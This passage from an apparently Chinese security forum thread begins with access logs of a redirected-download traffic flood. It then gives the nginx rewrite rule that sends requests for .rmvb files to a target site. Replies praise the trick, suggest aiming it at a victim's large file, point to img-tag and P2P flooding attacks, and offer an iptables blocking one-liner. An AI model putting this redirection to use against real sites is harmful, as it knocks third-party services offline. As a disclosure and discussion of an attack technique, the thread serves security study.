218.79.60.165 - - [24/May/2013:22:08:20 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

114.83.89.180 - - [24/May/2013:22:08:21 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

219.150.151.4 - - [24/May/2013:22:08:23 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"

14.117.194.204 - - [24/May/2013:22:08:23 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)"

183.156.53.206 - - [24/May/2013:22:08:24 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

113.89.97.65 - - [24/May/2013:22:08:24 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"

14.153.144.182 - - [24/May/2013:22:08:24 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"

113.89.97.65 - - [24/May/2013:22:08:25 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"

180.157.86.134 - - [24/May/2013:22:08:25 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

113.89.97.65 - - [24/May/2013:22:08:26 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"

61.171.115.42 - - [24/May/2013:22:08:26 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

118.213.174.214 - - [24/May/2013:22:08:26 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"

113.89.97.65 - - [24/May/2013:22:08:29 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"

58.19.214.162 - - [24/May/2013:22:08:29 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

113.89.97.65 - - [24/May/2013:22:08:30 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"

120.33.63.134 - - [24/May/2013:22:08:31 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

180.108.186.183 - - [24/May/2013:22:08:33 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; QQDownload 718; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"

183.156.53.206 - - [24/May/2013:22:08:33 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

218.11.176.18 - - [24/May/2013:22:08:33 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

113.89.97.65 - - [24/May/2013:22:08:34 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"

113.89.97.65 - - [24/May/2013:22:08:34 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"

58.209.237.174 - - [24/May/2013:22:08:34 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

58.212.102.13 - - [24/May/2013:22:08:35 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"

58.212.102.13 - - [24/May/2013:22:08:36 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"

58.212.102.13 - - [24/May/2013:22:08:36 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"

218.31.5.235 - - [24/May/2013:22:08:36 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; QQDownload 718)"

58.212.102.13 - - [24/May/2013:22:08:36 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"

58.212.102.13 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"

183.25.17.231 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

183.156.53.206 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

222.75.204.224 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

58.212.102.13 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"

58.212.102.13 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"

61.171.115.42 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

112.102.189.170 - - [24/May/2013:22:08:39 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

183.156.53.206 - - [24/May/2013:22:08:41 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

8#

imlonghao (imlonghao.com 友情链接) | 2013-05-24 22:10

此时规则如下。

location ~* \.(rmvb)$ {

rewrite ^/ http://test.wooyun.imlonghao.com/?xl;

}

9#

/fd (/proc) ?() | 2013-05-24 22:10

牛B

10#

xsser (十根阳具有长短!!) | 2013-05-24 22:14

我日... 这个量还挺大

11#

leaf | 2013-05-24 22:20

好思路!

12#

docall (陈公子是也。。。) | 2013-05-24 22:22

going down!贱心快找护舒宝赞助吧!

13#

斯文的鸡蛋 (有图有jb... 但有jb不一定有真相) | 2013-05-24 22:33

真特么淫荡

14#

L.N. (张飞+曹操) | 2013-05-24 22:52

真心淫荡

15#

Mujj (找个玩渗透网站的、教我玩渗透、我给他8位qq和情侣) | 2013-05-24 23:02

cat wooyun.org.log | grep '符合规则的' | awk '{print "iptables -I INPUT -p tcp --dport 80 -s ", $1, "-j DROP"}'| sort -n | uniq | sh

16#

x0ers (第一个知道牛奶能喝的人都对奶牛做了些什么?) | 2013-05-24 23:02

好思路啊.顶

17#

LittlePig (</html>) | 2013-05-25 00:13

可以扔猥琐流了…

18#

livers (如梦似幻) | 2013-05-25 11:41

@imlonghao 自伤800啊

19#

虚云 | 2013-05-25 12:09

你rewrite得起么,想杀死别人,前提是你自己血多。

@livers

中肯!

20#

虚云 | 2013-05-25 12:10

不过思路确实值得赞一下,如果在某些可以上传并发布地址的空间放一个热门大片,后果不堪设想。

21#

z7y (我是z7y,我为小胖子代言!!) | 2013-05-25 12:31

超赞....  扔猥琐流去吧~ @xsser

22#

insight-labs (Root Yourself in Success) | 2013-05-25 12:42

@虚云 如果能在对方网站上找到一个耗资源或者流量的链接,比如一个大文件。rewrite过去成本很低

23#

imlonghao (imlonghao.com 友情链接) | 2013-05-25 13:00

@虚云 @livers

观察只是rewrite的话,对自己没怎么伤...

像@insight-labs 所说的那样,对面有一个很大的文件,完全可以rewrite过去。

要注意,发起的这个链接是会去下载的..

24#

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-05-25 14:36

说到流量转发攻击,其实有更简单更高效的,直接去百度贴吧访问量大的帖子里:

详见:【CSRF】基于图片方式(<img)的 DDOS、CC、会话劫持以及刺探用户信息,你懂的……

25#

萧然 (喜欢一切美的东西·) | 2013-05-25 14:41

@核攻击 哇  这也可以?以前拿这种刷移动的推广 搞了个第一名 奖了个手机

26#

imlonghao (imlonghao.com 友情链接) | 2013-05-25 14:48

@核攻击 要D8要是能占据首页的话。。。。

27#

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-05-25 14:49

说起来云资源攻击,前些年有人曾伪装p2p热门资源发起巨型纯流量攻击……

28#

imlonghao (imlonghao.com 友情链接) | 2013-05-25 14:57

@核攻击 有地址看看么?

29#

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-05-25 15:07

@imlonghao 利用P2P网络发动大规模、大流量DDOS攻击

30#

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-05-25 15:18

@萧然 详见:【CSRF】基于图片方式(<img)的 DDOS、CC、会话劫持以及刺探用户信息

31#

CHForce (带马师) | 2013-05-25 15:58

一楼比一楼给力,招数越来越犀利

32#

happytree ("如果我死了,请吃掉我吧") | 2013-05-25 16:02

雅蠛蝶~太口怕了

33#

廷廷 (想法最重要) | 2013-05-25 16:16

@核攻击 果断学习啦!!!

34#

小森森 | 2013-05-25 17:44

赞一个~~不过……你自己网站也会很卡诶~

35#

imlonghao (imlonghao.com 友情链接) | 2013-05-25 18:08

@小森森 http://imlonghao.com 现在仍有这种情况,但是你觉得卡么?

36#

Mujj (找个玩渗透网站的、教我玩渗透、我给他8位qq和情侣) | 2013-05-25 18:52

@imlonghao 重写消耗的是CPU资源,不过也消不了多少。

37#

whking | 2013-05-25 19:56

@imlonghao 前几天你网站挂了,我以为你不开了的呢。

38#

imlonghao (imlonghao.com 友情链接) | 2013-05-25 20:32

@whking -.-##

39#

GaRY | 2013-05-26 00:45

好帖子!绝对精华。目前对这个方面进行ddos的技术不是没人想过,但是都没有实例化阶段。楼主这个帖子算是头一个了AFAIK。

40#

xsser (十根阳具有长短!!) | 2013-05-26 11:32

@livers 对洞主自己来说,这个应该只需要耗费重写的,但是对于目标来说可能还要过数据库......

41#

小森森 | 2013-05-26 14:56

@imlonghao 不卡。。但是上不去啊……

42#

蟋蟀哥哥 (popok是孙子!![just for fun]) | 2013-05-26 15:51

精华帖子了

hang | 2013-05-26 20:34

想到这个了,vessial在poc2011上面的演讲PPT

Xunlei_Network_Internal_for_PoC2011.pdf


最新回复 (0)
返回
发新帖